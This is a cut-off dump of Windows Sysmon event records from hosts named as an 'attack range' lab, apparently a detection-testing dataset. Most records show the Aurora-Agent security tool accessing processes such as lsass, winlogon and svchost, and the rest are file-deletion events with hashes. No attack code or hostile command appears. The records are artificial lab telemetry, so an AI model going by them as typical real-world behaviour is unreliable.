Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045057Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.792{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.785{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.769{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.756{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.719{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.716{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 23542300x800000000000000045048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:51.322{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=943AC13E2CF41F8158F5950013A14260,SHA256=D68B3E874D0A41DD2BD661F419F262F2181E7BB7C3DE31B7D2DEE2C138C31431,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017561Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:52.345{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E362534502D04A48B45204D487864095,SHA256=E687727291FFB615AC8229C7CA22D2D7A17AAA09510EBF9DD01BCFA1025DC53E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:52.378{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85E5E4B7F3D7EE6F19BD4D0933A09B4B,SHA256=6FBB7E54BD2B4918A9487A255D2DE332518DDAE68F0EA90B08C760A6ED71ACA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:52.284{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\respondent-20230118113741-046MD5=F3A77350075DBB208FEC17E5163EBA2F,SHA256=8E104D4FA3B2A2E0F7792F9479E83164AF9BF75506FCB23760AA4A41EC5F846D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:52.183{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 23542300x800000000000000017562Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:53.401{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52D0C44A7A033850772E5CF99C5D8800,SHA256=E914BC88AA40AEF3ED2598C802E645796C975E510F8DF18404BD8FD36E0C3D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:53.473{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13247F3151E1750C26DC5CD9044884CF,SHA256=2AE1B67256F6B334818A4849F4398B3BE04545C7A976060063A0C2529E556F5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:53.284{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-047MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017563Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:25:54.491{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D2C18B83E0461B1EC90AF512039E42E,SHA256=DF4DB1E6ED4D2A774635B8F5E43B11E1DEE88368E9AA43438F3B63BFA323A11B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045110Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.837{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045109Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045108Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.823{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045107Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.820{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045103Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045102Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.802{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 23542300x800000000000000045101Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.781{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=F2D948BDF0C1EA9D8BA33D2A8E5D1421,SHA256=375E48E20D18A0EEEA955E8EAB745BD63DABB8D5B9A057A2EEB4F6D0D3113EF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.772{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=8500642C07D47EE4F28D0B17875FA2CF,SHA256=B2485AC6A92E282787B88795AFDF2E1AC42D4E3BDFF9FEEF694EE7376EBCC30B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.771{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.751{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001A626190) 10341000x800000000000000045095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:25:54.750{FE4C2B44-DE08-63C7-F104-00000000AF02}60686508C:\Program 